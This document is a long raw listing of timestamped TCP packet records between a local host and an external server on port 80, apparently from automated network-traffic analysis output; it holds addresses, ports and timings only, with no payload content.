                                                                                                                                                                    Feb 8, 2024 19:08:50.002877951 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003273964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003288031 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003300905 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003329992 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003350019 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003361940 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003375053 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003386974 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003400087 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003413916 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003424883 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003427029 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003441095 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003454924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003458023 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003468990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003475904 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003487110 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003504038 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003528118 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003588915 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003602982 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003614902 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003628016 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003640890 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003653049 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003654957 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003668070 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003681898 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003681898 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003695965 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.003700972 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.003730059 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004301071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004316092 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004328012 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004342079 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004354000 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004354000 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004369020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004374027 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004383087 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004403114 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004421949 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004493952 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004508018 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004520893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004534006 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004547119 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004556894 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004560947 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004574060 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004585028 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004587889 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004601002 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004602909 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004616976 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004630089 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004633904 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004643917 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004657984 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004662991 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004673004 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004682064 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.004686117 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.004717112 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005141020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005156040 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005191088 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005260944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005275011 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005286932 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005300045 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005302906 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005314112 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005326986 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005330086 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005341053 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005353928 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005356073 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005367994 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005376101 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005382061 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005394936 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005408049 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005410910 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005425930 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005439043 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005444050 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005454063 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005462885 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005466938 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005481005 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005492926 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005495071 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005510092 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005523920 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.005532980 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.005561113 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006270885 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006285906 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006299019 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006313086 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006325006 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006329060 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006342888 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006356001 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006361008 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006370068 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006383896 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006388903 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006398916 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006414890 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006424904 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006424904 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006428003 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006441116 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006454945 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006457090 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006468058 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006481886 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006484985 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006494999 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006510019 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006521940 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006524086 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006537914 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006550074 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006553888 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006567955 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.006568909 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.006597042 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007055044 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007069111 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007083893 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007098913 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007103920 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007112980 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007126093 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007126093 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007158041 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007258892 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007273912 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007306099 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007436037 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007448912 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007462025 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007476091 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007478952 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007491112 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007505894 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007507086 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007519007 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007534027 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007534981 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007548094 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007560968 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007561922 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007574081 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007587910 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007590055 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007602930 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007615089 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007617950 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007632017 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007641077 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007647038 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007659912 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007671118 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007673979 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007687092 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007697105 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.007702112 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.007725000 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008341074 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008357048 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008368969 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008383036 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008397102 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008398056 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008409977 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008428097 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008433104 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008446932 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008460045 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008460999 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008479118 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008482933 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008497000 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008502960 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008512020 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008527040 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008539915 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008553028 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008555889 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008567095 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008580923 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008583069 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008594990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008605003 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008610010 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008622885 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008629084 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008636951 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008651018 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.008657932 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.008682966 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009192944 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009207964 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009221077 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009233952 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009246111 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009247065 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009262085 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009267092 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009274960 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009289026 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009298086 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009301901 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009316921 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009320021 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009330988 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009339094 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009346008 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009361029 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009375095 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009377956 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009387970 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009396076 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009402990 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009417057 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009430885 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009443045 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009444952 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009459019 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009474039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009479046 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009488106 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.009500980 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.009519100 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010071039 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010086060 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010124922 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010169983 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010184050 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010196924 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010210037 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010210991 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010222912 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010237932 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010241985 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010251999 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010265112 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010266066 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010279894 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010293961 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010298014 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010308027 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010320902 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010323048 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010338068 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010350943 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010353088 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010365963 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010379076 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010379076 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010392904 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010407925 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010409117 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010423899 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010433912 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.010466099 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.010489941 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011008978 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011023998 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011061907 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011066914 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011102915 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011230946 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011245012 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011256933 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011270046 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011282921 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011291027 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011296988 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011310101 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011311054 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011324883 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011337996 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011341095 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011351109 CET8049717172.67.221.35192.168.2.3
                                                                                                                                                                    Feb 8, 2024 19:08:50.011359930 CET4971780192.168.2.3172.67.221.35
                                                                                                                                                                    Feb 8, 2024 19:08:50.011363983 CET8049717172.67.221.35192.168.2.3
